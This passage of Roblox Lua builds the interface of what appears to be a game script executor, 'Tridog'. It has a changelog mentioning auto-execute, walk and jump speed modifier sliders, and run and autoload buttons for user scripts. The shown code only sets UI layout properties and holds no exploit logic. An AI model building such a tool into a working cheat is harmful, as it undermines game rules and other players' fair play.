Font.new("rbxasset://fonts/families/Inconsolata.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_4.AnchorPoint = Vector2.new(0.5, 0.5) trii.Title_4.TextSize = 100 trii.Title_4.Name = "Title" trii.Title_4.Size = UDim2.new(0.909815, 0, 0.273333, 0) trii.Title_4.TextColor3 = Color3.fromRGB(250, 250, 250) trii.Title_4.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_4.Text = "{comming soon}" trii.Title_4.Position = UDim2.new(0.545092, 0, 0.685901, 0) trii.Title_4.BackgroundTransparency = 1 trii.Title_4.TextXAlignment = Enum.TextXAlignment.Left trii.Title_4.Parent = trii.sample trii.ImageLabel.BorderSizePixel = 0 trii.ImageLabel.ScaleType = Enum.ScaleType.Fit trii.ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.ImageLabel.Image = "rbxassetid://15865858307" trii.ImageLabel.Size = UDim2.new(0.0631573, 0, 0.173628, 0) trii.ImageLabel.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.ImageLabel.BackgroundTransparency = 1 trii.ImageLabel.Position = UDim2.new(0.0408212, 0, 0.0501573, 0) trii.ImageLabel.Parent = trii.SettingsFrame trii.homeFrame.Active = true trii.homeFrame.BorderSizePixel = 0 trii.homeFrame.Size = UDim2.new(0.949745, 0, 0.646527, 0) trii.homeFrame.Position = UDim2.new(0.0244645, 0, 0.0897571, 0) trii.homeFrame.BackgroundTransparency = 0.45 trii.homeFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.homeFrame.ClipsDescendants = true trii.homeFrame.Name = "homeFrame" trii.homeFrame.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.homeFrame.Parent = trii.MainFrame trii.UICorner_12.CornerRadius = UDim.new(0.02, 0) trii.UICorner_12.Parent = trii.homeFrame trii.changelogFrame.BorderSizePixel = 0 trii.changelogFrame.CanvasSize = UDim2.new(0, 0, 1, 0) trii.changelogFrame.Selectable = false trii.changelogFrame.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.changelogFrame.AutomaticCanvasSize = Enum.AutomaticSize.Y trii.changelogFrame.Size = UDim2.new(0.16949, 0, 1.00031, 0) trii.changelogFrame.BackgroundTransparency = 0.35 trii.changelogFrame.ScrollBarImageTransparency = 0.64 trii.changelogFrame.ScrollBarThickness = 5 trii.changelogFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.changelogFrame.Name = "changelogFrame" trii.changelogFrame.Position = UDim2.new(-5.87782e-09, 0, 0, 0) trii.changelogFrame.Parent = trii.homeFrame trii.ScriptBox.TextWrapped = true trii.ScriptBox.LineHeight = 1.41 trii.ScriptBox.BorderSizePixel = 0 trii.ScriptBox.RichText = true trii.ScriptBox.TextYAlignment = Enum.TextYAlignment.Top trii.ScriptBox.BackgroundColor3 = Color3.fromRGB(75, 0, 0) trii.ScriptBox.FontFace = Font.new("rbxasset://fonts/families/Nunito.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.ScriptBox.Position = UDim2.new(0.0470594, 0, 0.0200526, 0) trii.ScriptBox.BackgroundTransparency = 1 trii.ScriptBox.AutomaticSize = Enum.AutomaticSize.Y trii.ScriptBox.TextSize = 22 trii.ScriptBox.ClipsDescendants = true trii.ScriptBox.Size = UDim2.new(0.952941, 0, 0.982121, 0) trii.ScriptBox.TextColor3 = Color3.fromRGB(150, 150, 150) trii.ScriptBox.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.ScriptBox.Text = "~~ Changelog v0.03 ~~\n+ Added auto execute\n+ Added option to save scripts\n+ Changed some stuff on console log\n\n~~ Changelog v0.02 ~~\n+ Added changelog\n+ Added game script section (will be adding different game scripts soon)\n+ Added Console Logging\n\n~~ Changelog v0.01 ~~\n- Tridog release :o" trii.ScriptBox.MultiLine = true trii.ScriptBox.CursorPosition = -1 trii.ScriptBox.Name = "ScriptBox" trii.ScriptBox.TextXAlignment = Enum.TextXAlignment.Left trii.ScriptBox.ClearTextOnFocus = false trii.ScriptBox.Parent = trii.changelogFrame trii.UICorner_13.CornerRadius = UDim.new(1, 0) trii.UICorner_13.Parent = trii.changelogFrame trii.UIListLayout_6.FillDirection = Enum.FillDirection.Horizontal trii.UIListLayout_6.SortOrder = Enum.SortOrder.LayoutOrder trii.UIListLayout_6.Padding = UDim.new(0.018, 0) trii.UIListLayout_6.Parent = trii.homeFrame trii.scriptsFrame.BorderSizePixel = 0 trii.scriptsFrame.CanvasSize = UDim2.new(0, 0, 1, 0) trii.scriptsFrame.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.scriptsFrame.AutomaticCanvasSize = Enum.AutomaticSize.Y trii.scriptsFrame.Size = UDim2.new(0.357601, 0, 1, 0) trii.scriptsFrame.BackgroundTransparency = 0.35 trii.scriptsFrame.Active = true trii.scriptsFrame.ScrollBarImageTransparency = 0.64 trii.scriptsFrame.ScrollBarThickness = 5 trii.scriptsFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.scriptsFrame.Name = "scriptsFrame" trii.scriptsFrame.Position = UDim2.new(0.186719, 0, 0, 0) trii.scriptsFrame.Parent = trii.homeFrame trii.UICorner_14.CornerRadius = UDim.new(1, 0) trii.UICorner_14.Parent = trii.scriptsFrame trii.UIListLayout_7.HorizontalAlignment = Enum.HorizontalAlignment.Center trii.UIListLayout_7.Padding = UDim.new(0.01, 0) trii.UIListLayout_7.Parent = trii.scriptsFrame trii._GameHeader.BorderSizePixel = 0 trii._GameHeader.Size = UDim2.new(1, 0, 0.157089, 0) trii._GameHeader.BorderColor3 = Color3.fromRGB(0, 0, 0) trii._GameHeader.Name = "#GameHeader" trii._GameHeader.BackgroundColor3 = Color3.fromRGB(35, 39, 49) trii._GameHeader.Parent = trii.scriptsFrame trii.Title_5.TextWrapped = true trii.Title_5.BorderSizePixel = 0 trii.Title_5.TextScaled = true trii.Title_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_5.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_5.TextSize = 14 trii.Title_5.Name = "Title" trii.Title_5.Size = UDim2.new(0.998909, 0, 0.572671, 0) trii.Title_5.TextColor3 = Color3.fromRGB(180, 193, 216) trii.Title_5.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_5.Text = "{game_name}" trii.Title_5.Position = UDim2.new(0, 0, 0.2, 0) trii.Title_5.BackgroundTransparency = 1 trii.Title_5.Parent = trii._GameHeader trii.UICorner_15.CornerRadius = UDim.new(0.1, 0) trii.UICorner_15.Parent = trii._GameHeader trii.TextButton.TextWrapped = true trii.TextButton.Active = false trii.TextButton.BorderSizePixel = 0 trii.TextButton.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.TextButton.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextButton.Position = UDim2.new(0.0264026, 0, 0.157089, 0) trii.TextButton.TextSize = 16 trii.TextButton.Size = UDim2.new(0.950495, 0, 0.1, 0) trii.TextButton.TextColor3 = Color3.fromRGB(180, 193, 216) trii.TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextButton.Text = "No scripts found for this game..." trii.TextButton.Parent = trii.scriptsFrame trii.UICorner_16.CornerRadius = UDim.new(0.1, 0) trii.UICorner_16.Parent = trii.TextButton trii.localplrFrame.BorderSizePixel = 0 trii.localplrFrame.Size = UDim2.new(0.287, 0, 1, 0) trii.localplrFrame.Position = UDim2.new(0.209419, 0, 3.06074e-08, 0) trii.localplrFrame.BackgroundTransparency = 0.4 trii.localplrFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.localplrFrame.Visible = false trii.localplrFrame.Name = "localplrFrame" trii.localplrFrame.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.localplrFrame.Parent = trii.homeFrame trii.UIListLayout_8.HorizontalAlignment = Enum.HorizontalAlignment.Center trii.UIListLayout_8.SortOrder = Enum.SortOrder.LayoutOrder trii.UIListLayout_8.Padding = UDim.new(0.01, 0) trii.UIListLayout_8.Parent = trii.localplrFrame trii.Header.BorderSizePixel = 0 trii.Header.Size = UDim2.new(1, 0, 0.157089, 0) trii.Header.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Header.Name = "Header" trii.Header.BackgroundColor3 = Color3.fromRGB(35, 39, 49) trii.Header.Parent = trii.localplrFrame trii.Title_6.TextWrapped = true trii.Title_6.BorderSizePixel = 0 trii.Title_6.TextScaled = true trii.Title_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_6.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_6.TextSize = 14 trii.Title_6.Name = "Title" trii.Title_6.Size = UDim2.new(0.998909, 0, 0.572671, 0) trii.Title_6.TextColor3 = Color3.fromRGB(180, 193, 216) trii.Title_6.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_6.Text = "Local Player" trii.Title_6.Position = UDim2.new(0, 0, 0.2, 0) trii.Title_6.BackgroundTransparency = 1 trii.Title_6.Parent = trii.Header trii.UICorner_17.CornerRadius = UDim.new(0.1, 0) trii.UICorner_17.Parent = trii.Header trii.walkspeed.BorderSizePixel = 0 trii.walkspeed.Size = UDim2.new(0.912001, 0, 0.127863, 0) trii.walkspeed.Position = UDim2.new(0.00907725, 0, 0.167089, 0) trii.walkspeed.BackgroundTransparency = 1 trii.walkspeed.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.walkspeed.Name = "walkspeed" trii.walkspeed.BackgroundColor3 = Color3.fromRGB(162, 162, 162) trii.walkspeed.Parent = trii.localplrFrame trii.Slider.BorderSizePixel = 0 trii.Slider.Size = UDim2.new(0.944831, 0, 0.393775, 0) trii.Slider.Position = UDim2.new(0.0289786, 0, 0.594506, 0) trii.Slider.BackgroundTransparency = 1 trii.Slider.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Slider.Name = "Slider" trii.Slider.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Slider:SetAttribute("ColorEnabled1", Color3.fromRGB(231, 174, 174)) trii.Slider:SetAttribute("ColorEnabled2", Color3.fromRGB(156, 19, 19)) trii.Slider:SetAttribute("IsEnabled", true) trii.Slider:SetAttribute("ColorDisabled1", Color3.fromRGB(202, 202, 202)) trii.Slider:SetAttribute("ColorDisabled2", Color3.fromRGB(158, 158, 158)) trii.Slider:SetAttribute("ValuePercent", 50) trii.Slider:SetAttribute("ValueIncrement", 1) trii.Slider.Parent = trii.walkspeed trii.Image.BorderSizePixel = 0 trii.Image.Size = UDim2.new(1, 0, 1, 0) trii.Image.BackgroundTransparency = 1 trii.Image.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Image.Name = "Image" trii.Image.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Image.Parent = trii.Slider trii.Bar_Background.AnchorPoint = Vector2.new(0, 0.5) trii.Bar_Background.BorderSizePixel = 0 trii.Bar_Background.Size = UDim2.new(1, 0, 0.15, 0) trii.Bar_Background.Position = UDim2.new(0, 0, 0.5, 0) trii.Bar_Background.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Bar_Background.Name = "Bar-Background" trii.Bar_Background.BackgroundColor3 = Color3.fromRGB(101, 112, 141) trii.Bar_Background.Parent = trii.Image trii.UICorner_18.CornerRadius = UDim.new(0.5, 0) trii.UICorner_18.Parent = trii.Bar_Background trii.Bar_Foreground.AnchorPoint = Vector2.new(0, 0.5) trii.Bar_Foreground.ZIndex = 2 trii.Bar_Foreground.BorderSizePixel = 0 trii.Bar_Foreground.Size = UDim2.new(0.5, 0, 0.3, 0) trii.Bar_Foreground.Position = UDim2.new(0, 0, 0.5, 0) trii.Bar_Foreground.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Bar_Foreground.Name = "Bar-Foreground" trii.Bar_Foreground.BackgroundColor3 = Color3.fromRGB(65, 68, 91) trii.Bar_Foreground.Parent = trii.Image trii.UICorner_19.CornerRadius = UDim.new(0.5, 0) trii.UICorner_19.Parent = trii.Bar_Foreground trii.Thumb.ImageColor3 = Color3.fromRGB(65, 68, 91) trii.Thumb.ZIndex = 3 trii.Thumb.BorderSizePixel = 0 trii.Thumb.ScaleType = Enum.ScaleType.Fit trii.Thumb.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Thumb.AnchorPoint = Vector2.new(0.5, 0.5) trii.Thumb.Image = "rbxassetid://11953889677" trii.Thumb.Size = UDim2.new(0.0778816, 0, 1, 0) trii.Thumb.Name = "Thumb" trii.Thumb.BackgroundTransparency = 1 trii.Thumb.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Thumb:SetAttribute("IsDragging", false) trii.Thumb.Parent = trii.Image trii.UIAspectRatioConstraint.DominantAxis = Enum.DominantAxis.Height trii.UIAspectRatioConstraint.Parent = trii.Thumb trii.Thumb_Pressed.ImageColor3 = Color3.fromRGB(65, 68, 91) trii.Thumb_Pressed.BorderSizePixel = 0 trii.Thumb_Pressed.ScaleType = Enum.ScaleType.Fit trii.Thumb_Pressed.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Thumb_Pressed.ImageTransparency = 0.8 trii.Thumb_Pressed.AnchorPoint = Vector2.new(0.5, 0.5) trii.Thumb_Pressed.Image = "rbxassetid://11953889677" trii.Thumb_Pressed.Size = UDim2.new(2, 0, 2, 0) trii.Thumb_Pressed.Name = "Thumb-Pressed" trii.Thumb_Pressed.BackgroundTransparency = 1 trii.Thumb_Pressed.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Thumb_Pressed.Visible = false trii.Thumb_Pressed.Parent = trii.Thumb trii.Configuration.Parent = trii.Slider trii.ObjectBarBackground.Name = "ObjectBarBackground" trii.ObjectBarBackground.Parent = trii.Configuration trii.ObjectBarForeground.Name = "ObjectBarForeground" trii.ObjectBarForeground.Parent = trii.Configuration trii.ObjectThumbNormal.Name = "ObjectThumbNormal" trii.ObjectThumbNormal.Parent = trii.Configuration trii.ObjectThumbPressed.Name = "ObjectThumbPressed" trii.ObjectThumbPressed.Parent = trii.Configuration trii.Title_7.TextWrapped = true trii.Title_7.BorderSizePixel = 0 trii.Title_7.TextScaled = true trii.Title_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_7.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_7.TextSize = 14 trii.Title_7.Name = "Title" trii.Title_7.Size = UDim2.new(0.998909, 0, 0.527078, 0) trii.Title_7.TextColor3 = Color3.fromRGB(180, 193, 216) trii.Title_7.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_7.Text = "Walk Speed Modified: 0" trii.Title_7.Position = UDim2.new(0.00612932, 0, -0.013275, 0) trii.Title_7.BackgroundTransparency = 1 trii.Title_7.Parent = trii.walkspeed trii.jumspeed.BorderSizePixel = 0 trii.jumspeed.Size = UDim2.new(0.912001, 0, 0.127863, 0) trii.jumspeed.Position = UDim2.new(0.00907725, 0, 0.167089, 0) trii.jumspeed.BackgroundTransparency = 1 trii.jumspeed.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.jumspeed.Name = "jumspeed" trii.jumspeed.BackgroundColor3 = Color3.fromRGB(162, 162, 162) trii.jumspeed.Parent = trii.localplrFrame trii.Slider_1.BorderSizePixel = 0 trii.Slider_1.Size = UDim2.new(0.944831, 0, 0.393775, 0) trii.Slider_1.Position = UDim2.new(0.0289786, 0, 0.594506, 0) trii.Slider_1.BackgroundTransparency = 1 trii.Slider_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Slider_1.Name = "Slider" trii.Slider_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Slider_1:SetAttribute("ColorEnabled1", Color3.fromRGB(231, 174, 174)) trii.Slider_1:SetAttribute("ColorEnabled2", Color3.fromRGB(156, 19, 19)) trii.Slider_1:SetAttribute("IsEnabled", true) trii.Slider_1:SetAttribute("ColorDisabled1", Color3.fromRGB(202, 202, 202)) trii.Slider_1:SetAttribute("ColorDisabled2", Color3.fromRGB(158, 158, 158)) trii.Slider_1:SetAttribute("ValuePercent", 50) trii.Slider_1:SetAttribute("ValueIncrement", 1) trii.Slider_1.Parent = trii.jumspeed trii.Image_1.BorderSizePixel = 0 trii.Image_1.Size = UDim2.new(1, 0, 1, 0) trii.Image_1.BackgroundTransparency = 1 trii.Image_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Image_1.Name = "Image" trii.Image_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Image_1.Parent = trii.Slider_1 trii.Bar_Background_1.AnchorPoint = Vector2.new(0, 0.5) trii.Bar_Background_1.BorderSizePixel = 0 trii.Bar_Background_1.Size = UDim2.new(1, 0, 0.15, 0) trii.Bar_Background_1.Position = UDim2.new(0, 0, 0.5, 0) trii.Bar_Background_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Bar_Background_1.Name = "Bar-Background" trii.Bar_Background_1.BackgroundColor3 = Color3.fromRGB(231, 174, 174) trii.Bar_Background_1.Parent = trii.Image_1 trii.UICorner_20.CornerRadius = UDim.new(0.5, 0) trii.UICorner_20.Parent = trii.Bar_Background_1 trii.Bar_Foreground_1.AnchorPoint = Vector2.new(0, 0.5) trii.Bar_Foreground_1.ZIndex = 2 trii.Bar_Foreground_1.BorderSizePixel = 0 trii.Bar_Foreground_1.Size = UDim2.new(0.5, 0, 0.3, 0) trii.Bar_Foreground_1.Position = UDim2.new(0, 0, 0.5, 0) trii.Bar_Foreground_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Bar_Foreground_1.Name = "Bar-Foreground" trii.Bar_Foreground_1.BackgroundColor3 = Color3.fromRGB(156, 19, 19) trii.Bar_Foreground_1.Parent = trii.Image_1 trii.UICorner_21.CornerRadius = UDim.new(0.5, 0) trii.UICorner_21.Parent = trii.Bar_Foreground_1 trii.Thumb_1.ImageColor3 = Color3.fromRGB(156, 19, 19) trii.Thumb_1.ZIndex = 3 trii.Thumb_1.BorderSizePixel = 0 trii.Thumb_1.ScaleType = Enum.ScaleType.Fit trii.Thumb_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Thumb_1.AnchorPoint = Vector2.new(0.5, 0.5) trii.Thumb_1.Image = "rbxassetid://11953889677" trii.Thumb_1.Size = UDim2.new(0.0778816, 0, 1, 0) trii.Thumb_1.Name = "Thumb" trii.Thumb_1.BackgroundTransparency = 1 trii.Thumb_1.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Thumb_1:SetAttribute("IsDragging", false) trii.Thumb_1.Parent = trii.Image_1 trii.UIAspectRatioConstraint_1.DominantAxis = Enum.DominantAxis.Height trii.UIAspectRatioConstraint_1.Parent = trii.Thumb_1 trii.Thumb_Pressed_1.ImageColor3 = Color3.fromRGB(156, 19, 19) trii.Thumb_Pressed_1.BorderSizePixel = 0 trii.Thumb_Pressed_1.ScaleType = Enum.ScaleType.Fit trii.Thumb_Pressed_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Thumb_Pressed_1.ImageTransparency = 0.8 trii.Thumb_Pressed_1.AnchorPoint = Vector2.new(0.5, 0.5) trii.Thumb_Pressed_1.Image = "rbxassetid://11953889677" trii.Thumb_Pressed_1.Size = UDim2.new(2, 0, 2, 0) trii.Thumb_Pressed_1.Name = "Thumb-Pressed" trii.Thumb_Pressed_1.BackgroundTransparency = 1 trii.Thumb_Pressed_1.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Thumb_Pressed_1.Visible = false trii.Thumb_Pressed_1.Parent = trii.Thumb_1 trii.Configuration_1.Parent = trii.Slider_1 trii.ObjectBarBackground_1.Name = "ObjectBarBackground" trii.ObjectBarBackground_1.Parent = trii.Configuration_1 trii.ObjectBarForeground_1.Name = "ObjectBarForeground" trii.ObjectBarForeground_1.Parent = trii.Configuration_1 trii.ObjectThumbNormal_1.Name = "ObjectThumbNormal" trii.ObjectThumbNormal_1.Parent = trii.Configuration_1 trii.ObjectThumbPressed_1.Name = "ObjectThumbPressed" trii.ObjectThumbPressed_1.Parent = trii.Configuration_1 trii.Scripts.Name = "Scripts" trii.Scripts.Parent = trii.Slider_1 trii.FormSliderHorizontalLocalScript.Enabled = false trii.FormSliderHorizontalLocalScript.Name = "FormSliderHorizontalLocalScript" trii.FormSliderHorizontalLocalScript.Disabled = true trii.FormSliderHorizontalLocalScript.Parent = trii.Scripts trii.Title_8.TextWrapped = true trii.Title_8.BorderSizePixel = 0 trii.Title_8.TextScaled = true trii.Title_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_8.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_8.TextSize = 14 trii.Title_8.Name = "Title" trii.Title_8.Size = UDim2.new(0.998909, 0, 0.527078, 0) trii.Title_8.TextColor3 = Color3.fromRGB(180, 193, 216) trii.Title_8.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_8.Text = "Jump Speed Modified: 0" trii.Title_8.Position = UDim2.new(0.00612932, 0, -0.013275, 0) trii.Title_8.BackgroundTransparency = 1 trii.Title_8.Parent = trii.jumspeed trii.LocalPlayerHandle.Name = "LocalPlayerHandle" trii.LocalPlayerHandle.Parent = trii.localplrFrame trii.FormSliderClass.Name = "FormSliderClass" trii.FormSliderClass.Parent = trii.localplrFrame trii.ExtendDraggableClass.Name = "ExtendDraggableClass" trii.ExtendDraggableClass.Parent = trii.localplrFrame trii.CurPos.TextWrapped = true trii.CurPos.BorderSizePixel = 0 trii.CurPos.TextScaled = true trii.CurPos.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.CurPos.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.CurPos.TextSize = 14 trii.CurPos.Name = "CurPos" trii.CurPos.Size = UDim2.new(0.898733, 0, 0.085544, 0) trii.CurPos.TextColor3 = Color3.fromRGB(180, 193, 216) trii.CurPos.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.CurPos.Text = "Current location: " trii.CurPos.Position = UDim2.new(0.000272832, 0, 0.442814, 0) trii.CurPos.BackgroundTransparency = 1 trii.CurPos.Parent = trii.localplrFrame trii.localscriptsFrame.BorderSizePixel = 0 trii.localscriptsFrame.CanvasSize = UDim2.new(0, 0, 1, 0) trii.localscriptsFrame.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.localscriptsFrame.AutomaticCanvasSize = Enum.AutomaticSize.Y trii.localscriptsFrame.Size = UDim2.new(0.43768, 0, 1, 0) trii.localscriptsFrame.BackgroundTransparency = 0.35 trii.localscriptsFrame.Active = true trii.localscriptsFrame.ScrollBarImageTransparency = 0.64 trii.localscriptsFrame.ScrollBarThickness = 5 trii.localscriptsFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.localscriptsFrame.Name = "localscriptsFrame" trii.localscriptsFrame.Position = UDim2.new(0.56232, 0, 0, 0) trii.localscriptsFrame.Parent = trii.homeFrame trii.UICorner_22.CornerRadius = UDim.new(1, 0) trii.UICorner_22.Parent = trii.localscriptsFrame trii.UIListLayout_9.HorizontalAlignment = Enum.HorizontalAlignment.Center trii.UIListLayout_9.SortOrder = Enum.SortOrder.LayoutOrder trii.UIListLayout_9.Padding = UDim.new(0.01, 0) trii.UIListLayout_9.Parent = trii.localscriptsFrame trii._GameHeader_1.BorderSizePixel = 0 trii._GameHeader_1.Size = UDim2.new(1, 0, 0.157089, 0) trii._GameHeader_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii._GameHeader_1.Name = "#GameHeader" trii._GameHeader_1.BackgroundColor3 = Color3.fromRGB(35, 39, 49) trii._GameHeader_1.Parent = trii.localscriptsFrame trii.Title_9.TextWrapped = true trii.Title_9.BorderSizePixel = 0 trii.Title_9.TextScaled = true trii.Title_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_9.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_9.TextSize = 14 trii.Title_9.Name = "Title" trii.Title_9.Size = UDim2.new(0.631911, 0, 0.572671, 0) trii.Title_9.TextColor3 = Color3.fromRGB(180, 193, 216) trii.Title_9.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_9.Text = "Local Scripts" trii.Title_9.Position = UDim2.new(0, 0, 0.2, 0) trii.Title_9.BackgroundTransparency = 1 trii.Title_9.Parent = trii._GameHeader_1 trii.UICorner_23.CornerRadius = UDim.new(0.1, 0) trii.UICorner_23.Parent = trii._GameHeader_1 trii.Add_btn.BorderSizePixel = 0 trii.Add_btn.Size = UDim2.new(0.345421, 0, 0.482072, 0) trii.Add_btn.Position = UDim2.new(0.63191, 0, 0.290598, 0) trii.Add_btn.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Add_btn.Name = "Add_btn" trii.Add_btn.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.Add_btn.Parent = trii._GameHeader_1 trii.TextButton_1.TextWrapped = true trii.TextButton_1.BorderSizePixel = 0 trii.TextButton_1.RichText = true trii.TextButton_1.TextScaled = true trii.TextButton_1.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.TextButton_1.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextButton_1.Position = UDim2.new(0.0427491, 0, 0.159589, 0) trii.TextButton_1.TextSize = 14 trii.TextButton_1.Size = UDim2.new(0.909327, 0, 0.659937, 0) trii.TextButton_1.TextColor3 = Color3.fromRGB(255, 255, 255) trii.TextButton_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextButton_1.Text = "+ Add Script" trii.TextButton_1.BackgroundTransparency = 1 trii.TextButton_1.Parent = trii.Add_btn trii.UICorner_24.CornerRadius = UDim.new(0.1, 0) trii.UICorner_24.Parent = trii.Add_btn trii.script_placeholder.BorderSizePixel = 0 trii.script_placeholder.Size = UDim2.new(0.967878, 0, 0.1, 0) trii.script_placeholder.Position = UDim2.new(0.0204618, 0, 0.167089, 0) trii.script_placeholder.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.script_placeholder.ClipsDescendants = true trii.script_placeholder.Name = "script_placeholder" trii.script_placeholder.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.script_placeholder.Parent = trii.localscriptsFrame trii.scriptTitle.TextWrapped = true trii.scriptTitle.BorderSizePixel = 0 trii.scriptTitle.TextScaled = true trii.scriptTitle.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.scriptTitle.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.scriptTitle.ClipsDescendants = true trii.scriptTitle.TextSize = 14 trii.scriptTitle.Name = "scriptTitle" trii.scriptTitle.Size = UDim2.new(0.598337, 0, 0.484707, 0) trii.scriptTitle.TextColor3 = Color3.fromRGB(180, 193, 216) trii.scriptTitle.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.scriptTitle.Text = "Local Scripts" trii.scriptTitle.Position = UDim2.new(0.0255949, 0, 0.247684, 0) trii.scriptTitle.BackgroundTransparency = 1 trii.scriptTitle.TextXAlignment = Enum.TextXAlignment.Left trii.scriptTitle.Parent = trii.script_placeholder trii.Buttons.BorderSizePixel = 0 trii.Buttons.Size = UDim2.new(0.32274, 0, 0.81382, 0) trii.Buttons.Position = UDim2.new(0.665989, 0, 0.0859291, 0) trii.Buttons.BackgroundTransparency = 1 trii.Buttons.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Buttons.Name = "Buttons" trii.Buttons.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Buttons.Parent = trii.script_placeholder trii.UIListLayout_10.FillDirection = Enum.FillDirection.Horizontal trii.UIListLayout_10.HorizontalAlignment = Enum.HorizontalAlignment.Right trii.UIListLayout_10.VerticalAlignment = Enum.VerticalAlignment.Center trii.UIListLayout_10.SortOrder = Enum.SortOrder.LayoutOrder trii.UIListLayout_10.Padding = UDim.new(0.015, 0) trii.UIListLayout_10.Parent = trii.Buttons trii.run.BorderSizePixel = 0 trii.run.Size = UDim2.new(0.219148, 0, 1, 0) trii.run.Position = UDim2.new(0.780852, 0, 0, 0) trii.run.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.run.Name = "run" trii.run.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.run.Parent = trii.Buttons trii.UIListLayout_11.FillDirection = Enum.FillDirection.Horizontal trii.UIListLayout_11.HorizontalAlignment = Enum.HorizontalAlignment.Center trii.UIListLayout_11.VerticalAlignment = Enum.VerticalAlignment.Center trii.UIListLayout_11.ItemLineAlignment = Enum.ItemLineAlignment.Center trii.UIListLayout_11.Parent = trii.run trii.UICorner_25.CornerRadius = UDim.new(0.06, 0) trii.UICorner_25.Parent = trii.run trii.button.ZIndex = 2 trii.button.BorderSizePixel = 0 trii.button.ScaleType = Enum.ScaleType.Fit trii.button.Image = "rbxassetid://3926305904" trii.button.ImageRectSize = Vector2.new(36, 36) trii.button.Size = UDim2.new(0.5, 0, 0.5, 0) trii.button.Name = "button" trii.button.BackgroundTransparency = 1 trii.button.Position = UDim2.new(0.5, 0, 0.5, 0) trii.button.ImageRectOffset = Vector2.new(404, 844) trii.button.Parent = trii.run trii.autoload.BorderSizePixel = 0 trii.autoload.Size = UDim2.new(0.627535, 0, 1, 0) trii.autoload.Position = UDim2.new(0.0928736, 0, 0, 0) 